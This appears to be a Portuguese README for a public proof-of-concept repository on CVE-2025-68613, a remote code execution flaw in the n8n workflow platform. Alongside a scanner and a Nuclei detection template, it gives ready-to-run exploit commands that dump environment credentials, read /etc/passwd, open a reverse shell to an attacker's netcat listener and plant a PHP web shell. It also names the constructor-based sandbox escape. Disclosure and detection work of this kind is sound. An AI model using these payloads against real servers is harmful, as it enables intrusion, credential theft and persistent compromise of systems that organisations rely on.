
PoC público + Scanner e pesquisa para CVE-2025-68613: RCE crítica na Automação de Fluxos de Trabalho n8n via Injeção de Expressão (CVSS 10.0). Inclui ferramentas de detecção, exploit completo e orientações de remediação.

CVE-2025-68613 é uma vulnerabilidade crítica de Execução Remota de Código (RCE) descoberta no n8n, uma plataforma popular de automação de fluxos de trabalho de código aberto. Essa vulnerabilidade permite que usuários autenticados executem código arbitrário no servidor, podendo levar ao comprometimento total do sistema.
O n8n é uma plataforma de automação de fluxos de trabalho de código aberto que permite aos usuários:
As organizações usam o n8n para:
Esse papel central na infraestrutura de TI torna as vulnerabilidades particularmente perigosas, pois podem fornecer aos atacantes acesso a redes inteiras e dados confidenciais.
Este repositório inclui ferramentas prontas para uso na detecção de vulnerabilidades e testes de exploração:
cve-2025-68613-scanner.pyObjetivo: Detecção segura, sem exploração, de instâncias n8n vulneráveis
Recursos:
Uso:```bash python3 cve-2025-68613-scanner.py -u http://target:5678
**Saída**:
- Código de saída 0: Não vulnerável
- Código de saída 1: Versão indeterminada (pode estar corrigida ou oculta)
- Código de saída 2: Versão vulnerável detectada
### 2. Nuclei Template: `CVE-2025-68613.yaml`
**Propósito**: Detecção automatizada de vulnerabilidades e teste básico de avaliação de expressões
**Características**:
- Requer token de autenticação válido
- Testa a capacidade de injeção de expressões
- Tenta ler o contexto global do Node.js (process.platform)
- Cria fluxos de trabalho de teste para validar o vetor de RCE
- Classificação de severidade Crítica CVSS 10.0
**Uso**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v
# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt
exploit_cve-2025-68613.pyObjetivo: Exploit completo de prova de conceito com múltiplos payloads de ataque
Recursos:
Requisitos:
Instalação:```bash pip install requests chmod +x exploit_cve-2025-68613.py
**Exemplos de Uso**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload info
# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload cmd --command "whoami"
# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload env
# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload read --file "/etc/passwd"
# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload write \
--file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'
Como Funciona:
this.constructor.constructor()process.platform ou outras APIs do Node.jsCódigos de Saída:
Em termos simples: o n8n permite que os usuários escrevam expressões em workflows para processar dados dinamicamente. Porém, essas expressões são avaliadas sem um sandbox adequado, permitindo que atacantes escapem do contexto de execução pretendido e executem código arbitrário no servidor.
Quando você cria um workflow no n8n, você pode usar "expressões" para manipular dados. Essas expressões deveriam ser executadas em um ambiente restrito. No entanto, a vulnerabilidade mostra que essas expressões podem acessar o sistema subjacente, permitindo que um atacante: